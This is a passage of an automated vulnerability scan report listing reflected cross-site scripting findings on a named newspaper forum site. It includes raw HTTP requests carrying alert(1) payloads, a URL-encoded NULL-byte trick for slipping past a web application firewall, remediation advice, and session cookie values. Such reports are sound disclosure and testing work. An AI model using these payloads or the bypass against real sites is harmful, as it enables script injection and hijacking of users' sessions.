The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ef166"-alert(1)-"5348053c353 was submitted in the REST URL parameter 2. This input was echoed as ef166"-alert(1)-"5348053c353 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum%00ef166"-alert(1)-"5348053c353/602 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068
1.18. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 3]
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0087dba"-alert(1)-"bd7fc6dfef5 was submitted in the REST URL parameter 3. This input was echoed as 87dba"-alert(1)-"bd7fc6dfef5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum/602%0087dba"-alert(1)-"bd7fc6dfef5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:39 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cac3"-alert(1)-"ff2a2ccfa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums8cac3"-alert(1)-"ff2a2ccfa6/forum/673 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:12:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=7cf2c41678eb464964f8a0ac1163697f; expires=Wed, 08 Dec 2010 02:46:18 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:13:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22034
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f1250"-alert(1)-"6cf71db7b96 was submitted in the REST URL parameter 2. This input was echoed as f1250"-alert(1)-"6cf71db7b96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum%00f1250"-alert(1)-"6cf71db7b96/673 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:13:32 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ec6a4cd6b8b79036be9cc2544a3b80f1; expires=Wed, 08 Dec 2010 02:46:52 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:13:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21992
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00827f3"-alert(1)-"682449f4fa5 was submitted in the REST URL parameter 3. This input was echoed as 827f3"-alert(1)-"682449f4fa5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/forum/673%00827f3"-alert(1)-"682449f4fa5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:13:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=96d5ff16ceb4d4857e2b1a534cbdbe8f; expires=Wed, 08 Dec 2010 02:47:18 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:14:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21992
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55459"-alert(1)-"f8751e5772f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0035e64"-alert(1)-"1c84bda8999 was submitted in the REST URL parameter 2. This input was echoed as 35e64"-alert(1)-"1c84bda8999 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0054fb5"-alert(1)-"d8ab2187b4c was submitted in the REST URL parameter 3. This input was echoed as 54fb5"-alert(1)-"d8ab2187b4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0031fdf"-alert(1)-"ae07d35c128 was submitted in the REST URL parameter 4. This input was echoed as 31fdf"-alert(1)-"ae07d35c128 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7fea7<script>alert(1)</script>441aed72aaa was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the js_param1 request parameter is copied into the HTML document as plain text between tags. The payload 4134b<script>alert(1)</script>ea3b7054a28 was submitted in the js_param1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7fc6"-alert(1)-"9628637350 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsd7fc6"-alert(1)-"9628637350/poll HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:12:05 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=d014b033f451192e0b481c31c0f9c21f; expires=Wed, 08 Dec 2010 02:45:25 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:12:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22022
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00cc000"-alert(1)-"9c127b33533 was submitted in the REST URL parameter 2. This input was echoed as cc000"-alert(1)-"9c127b33533 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /forums/poll%00cc000"-alert(1)-"9c127b33533 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:12:30 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ba286c7c4afb5835084961bfc4371e7b; expires=Wed, 08 Dec 2010 02:45:50 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:12:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21987
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dae6d"-alert(1)-"6579eb870fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0038e10"-alert(1)-"50952c2689f was submitted in the REST URL parameter 2. This input was echoed as 38e10"-alert(1)-"50952c2689f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00db1dc"-alert(1)-"884372cd347 was submitted in the REST URL parameter 3. This input was echoed as db1dc"-alert(1)-"884372cd347 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea44e"-alert(1)-"b9cbcd4d1f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrssea44e"-alert(1)-"b9cbcd4d1f1/forum/602/5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22114
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861fb"-alert(1)-"f033e721dd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrss/forum861fb"-alert(1)-"f033e721dd3/602/5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22114
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abcc9"-alert(1)-"c5da668924b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jrss/forum/602abcc9"-alert(1)-"c5da668924b/5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22117
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ddeb"-alert(1)-"d654b8caae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll6ddeb"-alert(1)-"d654b8caae1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:05:52 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22084
1.37. http://forums.mercurynews.com/poll [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://forums.mercurynews.com
Path: /poll
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 617c4"-alert(1)-"5f42983c31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll?617c4"-alert(1)-"5f42983c31b=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19326
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 266bd"-alert(1)-"bf4e6a9d30d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll266bd"-alert(1)-"bf4e6a9d30d/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:05:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22216
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f844"-alert(1)-"3df5df2d371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county2f844"-alert(1)-"3df5df2d371 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20220
1.40. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1bf3"-alert(1)-"01dc7af58ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county?b1bf3"-alert(1)-"01dc7af58ce=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:54 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
